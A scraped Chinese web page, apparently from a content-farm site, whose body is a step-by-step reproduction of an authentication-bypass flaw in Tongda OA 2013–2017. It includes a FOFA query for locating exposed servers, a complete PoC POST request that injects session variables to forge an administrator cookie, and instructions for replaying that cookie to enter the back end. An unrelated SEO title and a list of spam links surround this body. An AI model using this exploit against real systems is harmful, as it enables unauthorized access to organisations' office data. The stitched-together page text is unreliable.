当前位置: 首页 > news >正文

广州新公司网站建设怎么做网站推广电话

广州新公司网站建设,怎么做网站推广电话,微信模板图片,国际英文网站通达OA是中国通达公司的一套协同办公自动化软件#xff0c;通达OA2013#xff0c;通达OA2016#xff0c;通达OA2017 存在身份认证绕过漏洞#xff0c;攻击者可以利用漏洞生成cookie#xff0c;实现未授权访问。 1.漏洞级别 高危 2.漏洞搜索 fofa titleoffice An…通达OA是中国通达公司的一套协同办公自动化软件通达OA2013通达OA2016通达OA2017 存在身份认证绕过漏洞攻击者可以利用漏洞生成cookie实现未授权访问。 1.漏洞级别 高危 2.漏洞搜索 fofa titleoffice Anywhere 如需指定版本可以搜titleoffice Anywhere 2013 3.漏洞复现 3.1 获取有效cookie poc请求 POST /module/retrieve_pwd/header.inc.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 1024_SESSION[LOGIN_THEME]15_SESSION[LOGIN_USER_ID]1_SESSION[LOGIN_UID]1_SESSION[LOGIN_FUNC_STR]1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,注手动测试时需要注意Content-Type为必须项否则生成的cookie无效。我在这里被坑了好久 导致一直没成功复现 返回的Set-Cookie即为我们需要的有效cookie。 3.2 实现登录 将上一步获取的cookie设置到header中。 注 这个参数名需要修改成Cookie 而不是Set-Cookie 直接请求后台 url/general/即可复现成功网页端可以将cookie手动添加进去然后访问 至此漏洞就复现完成了。
http://www.pierceye.com/news/933766/

相关文章:

  • 哈尔滨企业建站网站开发推广文案怎么写
  • 建立电子商务网站目的想要开网店怎么开
  • iis怎么建设网站内容杭州做搜索引擎网站的公司
  • 兰州网站开发价格建设和住房保障部 网站
  • 机械设备网站建设效果好的徐州网站开发
  • 商丘网站建设专业现状桓台县网站建设
  • 一级a做爰片免费网站孕交视频教程wordpress用的什么前端
  • 中文设计网站wordpress退出登录
  • 贵阳网站建设多少钱?帝国cms资源网模板
  • 利津网站定制wordpress文章内容下载手机
  • 西宁网站搭建百度网站制作联系方式
  • 中铁建设集团门户网站登陆翻页h5制作软件
  • 在线教育网站建设策划中国哪里在大建设
  • 宁波网站制作首荐荣盛网络好网站后台发布了但看不见
  • 用asp做网站出现空白30天网站建设全程实录 pdf
  • 吉林3厅官齐聚任免大会宁波网站建设广州活动策划公司排名
  • 个人阿里云账号可以做网站备案ip网址域名查询网
  • 厦门的企业网站企业形象网站建设意义
  • 网站源码网网站建设 制作教程
  • 怎么样销售关于网站建设网站服务器过期了怎么办
  • 常州建网站需要多少钱直播app开发费用
  • hpsocket 网站开发英文网站cms
  • 外贸自建站有哪些网站开发有哪几类
  • 青岛网站建设推广短视频运营是做什么的
  • 华为官方网站进入wordpress单页增加分页
  • 互动营销型网站建设大型网站建设开发设计公司
  • 锦州建设局网站商城网站建设方案电子版
  • 网站上删除信息如何做飞虎队网站建设
  • 中国有多少个网站网站做视频一个月有多少钱收入
  • 网站文字大小普洱市建设局网站